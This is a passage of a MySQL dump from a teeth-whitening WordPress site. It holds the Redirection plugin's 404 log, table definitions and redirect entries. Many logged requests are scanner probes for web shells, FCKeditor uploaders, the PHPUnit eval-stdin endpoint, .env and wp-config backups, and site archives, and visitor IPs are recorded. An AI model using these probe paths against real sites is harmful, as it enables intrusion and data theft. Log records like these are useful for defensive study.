+https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/teeth-whitening','95.216.96.244'),(61411,'2021-06-12 15:44:43','/?p=7','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/home-kits','95.216.96.244'),(61412,'2021-06-12 15:44:47','/?p=9','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/reviews','95.216.96.244'),(61413,'2021-06-12 15:44:53','/?p=11','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/shop','95.216.96.244'),(61414,'2021-06-12 16:21:41','/2018/08/14/how-to-achieve-the-perfect-smile/','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.149.228'),(61415,'2021-06-12 18:11:55','/administrator/fckeditor/editor/filemanager/upload/php/upload.php','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',NULL,'5.188.210.4'),(61416,'2021-06-12 18:24:27','/wso.php',NULL,NULL,'176.113.251.156'),(61417,'2021-06-12 18:24:28','/wso.php',NULL,NULL,'176.113.251.156'),(61418,'2021-06-12 19:19:39','/administrator/FCKeditor/editor/filemanager/upload/php/upload.php','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',NULL,'5.188.210.4'),(61419,'2021-06-12 20:46:12','/js/FCKeditor/editor/filemanager/upload/php/upload.php','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',NULL,'5.188.210.4'),(61420,'2021-06-12 22:00:27','/source.sql','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','45.92.228.50'),(61421,'2021-06-12 23:29:55','/?p=72','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/prices','95.216.96.244'),(61422,'2021-06-12 23:30:00','/?p=17','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/contact-us','95.216.96.244'),(61423,'2021-06-12 23:30:16','/?p=167','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/book-a-teeth-whitening-session%e2%80%8e','95.216.96.244'),(61424,'2021-06-12 23:30:20','/?p=201','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile/can-you-make-dental-implants-last-forever/general-dentistry-services','95.216.96.244'),(61425,'2021-06-13 02:10:03','/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',NULL,'5.188.210.4'),(61426,'2021-06-13 04:47:04','/wp-config.php~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'185.145.203.195'),(61427,'2021-06-13 04:47:22','/site.zip','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'45.40.166.167'),(61428,'2021-06-13 04:47:33','/wp-config.php.old','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'184.168.46.82'),(61429,'2021-06-13 04:47:43','/wp-config.php.resetwp_bak','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'50.63.197.17'),(61430,'2021-06-13 04:48:01','/wp-config','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'42.112.30.70'),(61431,'2021-06-13 04:48:10','/wp-config.php.bak.a2','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'43.241.57.18'),(61432,'2021-06-13 04:48:38','/wordpress.zip','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'160.153.154.3'),(61433,'2021-06-13 04:48:57','/.well-known.zip','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'198.71.239.41'),(61434,'2021-06-13 04:49:08','/backup.zip','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'190.183.61.120'),(61435,'2021-06-13 04:49:14','/public_html.zip','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'184.168.152.103'),(61436,'2021-06-13 04:49:27','/wp-admin.zip','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'184.168.46.206'),(61437,'2021-06-13 04:49:34','/teethwhiteningproduct.co.uk.zip','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',NULL,'160.153.147.160'),(61438,'2021-06-13 08:07:58','/vendor/phpunit/phpunit/LICENSE','Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)',NULL,'65.21.189.235'),(61439,'2021-06-13 09:51:26','/.env','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36',NULL,'193.56.29.26'),(61440,'2021-06-13 09:51:32','/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','python-requests/2.24.0',NULL,'193.56.29.26'),(61441,'2021-06-13 09:51:35','/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','python-requests/2.24.0',NULL,'193.56.29.26'),(61442,'2021-06-13 09:53:24','/wp-content/plugins/wpdiscuz/themes/default/style.css','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','anonymousfox.co','217.160.255.15'),(61443,'2021-06-13 09:53:32','/wp-content/plugins/wpdiscuz/themes/default/style.css','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','anonymousfox.co','217.160.255.15'),(61444,'2021-06-13 10:41:19','/?author=2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','http://www.teethwhiteningproduct.co.uk///?author=2','210.13.75.122'),(61445,'2021-06-13 10:41:19','/?author=2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','https://www.teethwhiteningproduct.co.uk/?author=2','210.13.75.122'),(61446,'2021-06-13 11:27:47','/administrator/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',NULL,'5.188.210.4'),(61447,'2021-06-13 11:38:21','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','50.21.189.251'),(61448,'2021-06-13 11:38:29','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','50.21.189.251'),(61449,'2021-06-13 11:38:39','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','50.21.189.251'),(61450,'2021-06-13 11:38:48','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','50.21.189.251'),(61451,'2021-06-13 12:22:11','/2018/08/14/how-to-achieve-the-perfect-smile/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,'157.90.181.150'),(61452,'2021-06-13 13:25:12','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/dentists','95.216.96.244'),(61453,'2021-06-13 13:25:19','/2018/08/14/how-to-achieve-the-perfect-smile/','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile/can-you-make-dental-implants-last-forever','95.216.96.244'),(61454,'2021-06-13 13:45:01','/wordpress/wp-admin/install.php?step=1','Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)',NULL,'139.59.76.9'),(61455,'2021-06-13 13:45:07','/wordpress/wp-admin/install.php?step=1','Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)',NULL,'139.59.76.9'),(61456,'2021-06-13 15:19:29','/administrator/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',NULL,'5.188.210.4'),(61457,'2021-06-13 15:42:03','/\">Teeth','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,'216.244.66.198'),(61458,'2021-06-13 17:36:47','/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.129'),(61459,'2021-06-13 17:37:15','/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.129'),(61460,'2021-06-13 17:38:08','/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.129'),(61461,'2021-06-13 17:38:37','/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.129'),(61462,'2021-06-13 21:04:38','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','217.160.255.15'),(61463,'2021-06-13 21:04:50','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','217.160.255.15'),(61464,'2021-06-13 21:05:06','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','217.160.255.15'),(61465,'2021-06-13 21:05:16','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','217.160.255.15'),(61466,'2021-06-14 00:54:16','/2018/08/14/how-to-achieve-the-perfect-smile','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.130.30'),(61467,'2021-06-14 03:28:36','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','217.160.255.15'),(61468,'2021-06-14 03:28:58','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','217.160.255.15'),(61469,'2021-06-14 03:29:23','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','217.160.255.15'),(61470,'2021-06-14 03:29:47','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','217.160.255.15'),(61471,'2021-06-14 11:08:18','/]Rocklin','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,'216.244.66.198'),(61472,'2021-06-14 11:14:01','//?author=2','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36',NULL,'45.141.84.35'),(61473,'2021-06-14 11:14:02','//?author=3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36',NULL,'45.141.84.35'),(61474,'2021-06-14 11:37:30','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,'66.249.64.118'),(61475,'2021-06-14 12:58:50','/Vuln.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',NULL,'162.218.176.34'),(61476,'2021-06-14 14:29:19','/?author=2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','http://teethwhiteningproduct.co.uk///?author=2','62.109.20.196'),(61477,'2021-06-14 15:03:09','/wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',NULL,'5.188.210.4'),(61478,'2021-06-14 16:33:39','/wp-content/plugins/ioptimization/IOptimize.php?rchk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',NULL,'5.188.210.4'),(61479,'2021-06-14 22:54:33','/humans.txt','Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36','http://teethwhiteningproduct.co.uk/humans.txt','93.158.90.152'),(61480,'2021-06-14 22:54:33','/ads.txt','Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36','http://teethwhiteningproduct.co.uk/ads.txt','93.158.90.136'),(61481,'2021-06-15 01:15:50','/èåºè¢é©´','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,'95.91.15.174'),(61482,'2021-06-15 04:33:30','/teethwhiteningproduct-co-uk.sql.tar','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','45.92.228.50'),(61483,'2021-06-15 10:37:23','/2018/01/30/preventive-dentistry','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.139.42'),(61484,'2021-06-15 11:24:00','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.155.236'),(61485,'2021-06-15 16:13:16','/?author=2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','http://teethwhiteningproduct.co.uk///?author=2','108.163.132.249'),(61486,'2021-06-15 17:55:26','/teethwhiteningproduct.sql.tar','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','45.92.228.50'),(61487,'2021-06-15 20:50:37','/2018/01/30/preventive-dentistry','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.130.30'),(61488,'2021-06-15 20:50:38','/2018/01/30/preventive-dentistry','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.130.30'),(61489,'2021-06-15 21:54:10','/co.uk.mysql.zip','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','31.13.191.71'),(61490,'2021-06-15 22:20:11','/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.140'),(61491,'2021-06-15 22:20:20','/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.140'),(61492,'2021-06-15 22:20:39','/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.140'),(61493,'2021-06-15 22:20:49','/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.140'),(61494,'2021-06-16 01:17:16','/teethwhiteningproduct.co.uk.mysql.zip','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','31.13.191.71'),(61495,'2021-06-16 03:09:36','/2018/08/14/how-to-achieve-the-perfect-smile','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.149.228'),(61496,'2021-06-16 03:10:26','/2018/08/14/how-to-achieve-the-perfect-smile','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.149.228'),(61497,'2021-06-16 03:19:55','/teethwhiteningproductcouk.mysql.zip','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','31.13.191.71'),(61498,'2021-06-16 06:55:58','/teethwhiteningproduct-co-uk.mysql.zip','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','31.13.191.71'),(61499,'2021-06-16 07:22:02','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.158.36'),(61500,'2021-06-16 07:22:03','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.158.36'),(61501,'2021-06-16 09:01:24','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.121'),(61502,'2021-06-16 09:02:00','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.121'),(61503,'2021-06-16 09:02:21','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.121'),(61504,'2021-06-16 09:02:57','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.121'),(61505,'2021-06-16 11:43:52','/?author=2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','http://teethwhiteningproduct.co.uk///?author=2','161.35.109.127'),(61506,'2021-06-16 12:58:07','//?author=2','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36',NULL,'5.133.11.119'),(61507,'2021-06-16 15:30:07','/wp-content/db-cache.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.129'),(61508,'2021-06-16 15:30:36','/wp-content/db-cache.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.129'),(61509,'2021-06-16 17:43:38','/wp-content/db-cache.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.225'),(61510,'2021-06-16 17:43:47','/wp-content/db-cache.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','195.201.125.225'),(61511,'2021-06-16 18:58:21','/apple-touch-icon-precomposed.png','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',NULL,'195.211.23.206'),(61512,'2021-06-16 18:58:26','/apple-touch-icon.png','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',NULL,'195.211.23.209');
/*!40000 ALTER TABLE `wp_redirection_404` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_redirection_groups`
--
DROP TABLE IF EXISTS `wp_redirection_groups`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_groups` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(50) NOT NULL,
`tracking` int(11) NOT NULL DEFAULT 1,
`module_id` int(11) unsigned NOT NULL DEFAULT 0,
`status` enum('enabled','disabled') NOT NULL DEFAULT 'enabled',
`position` int(11) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `module_id` (`module_id`),
KEY `status` (`status`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_redirection_groups`
--
LOCK TABLES `wp_redirection_groups` WRITE;
/*!40000 ALTER TABLE `wp_redirection_groups` DISABLE KEYS */;
INSERT INTO `wp_redirection_groups` VALUES (1,'Redirections',1,1,'enabled',0),(2,'Modified Posts',1,1,'enabled',1);
/*!40000 ALTER TABLE `wp_redirection_groups` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_redirection_items`
--
DROP TABLE IF EXISTS `wp_redirection_items`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_items` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`url` mediumtext NOT NULL,
`regex` int(11) unsigned NOT NULL DEFAULT 0,
`position` int(11) unsigned NOT NULL DEFAULT 0,
`last_count` int(10) unsigned NOT NULL DEFAULT 0,
`last_access` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`group_id` int(11) NOT NULL DEFAULT 0,
`status` enum('enabled','disabled') NOT NULL DEFAULT 'enabled',
`action_type` varchar(20) NOT NULL,
`action_code` int(11) unsigned NOT NULL,
`action_data` mediumtext DEFAULT NULL,
`match_type` varchar(20) NOT NULL,
`title` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `url` (`url`(191)),
KEY `status` (`status`),
KEY `regex` (`regex`),
KEY `group_idpos` (`group_id`,`position`),
KEY `group` (`group_id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_redirection_items`
--
LOCK TABLES `wp_redirection_items` WRITE;
/*!40000 ALTER TABLE `wp_redirection_items` DISABLE KEYS */;
INSERT INTO `wp_redirection_items` VALUES (1,'/]Teeth',0,0,155,'2021-06-12 14:10:41',1,'enabled','url',301,'/teeth-whitening/','url',''),(2,'\">Teeth',0,1,0,'0000-00-00 00:00:00',1,'enabled','url',301,'/]Teeth /teeth-whitening/ Edit | Delete | Disable','url','');
/*!40000 ALTER TABLE `wp_redirection_items` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_redirection_logs`
--
DROP TABLE IF EXISTS `wp_redirection_logs`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_logs` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`created` datetime NOT NULL,
`url` mediumtext NOT NULL,
`sent_to` mediumtext DEFAULT NULL,
`agent` mediumtext NOT NULL,
`referrer` mediumtext DEFAULT NULL,
`redirection_id` int(11) unsigned DEFAULT NULL,
`ip` varchar(45) DEFAULT NULL,
`module_id` int(11) unsigned NOT NULL,
`group_id` int(11) unsigned DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `created` (`created`),
KEY `redirection_id` (`redirection_id`),
KEY `ip` (`ip`),
KEY `group_id` (`group_id`),
KEY `module_id` (`module_id`)
) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_redirection_logs`
--
LOCK TABLES `wp_redirection_logs` WRITE;
/*!40000 ALTER TABLE `wp_redirection_logs` DISABLE KEYS */;
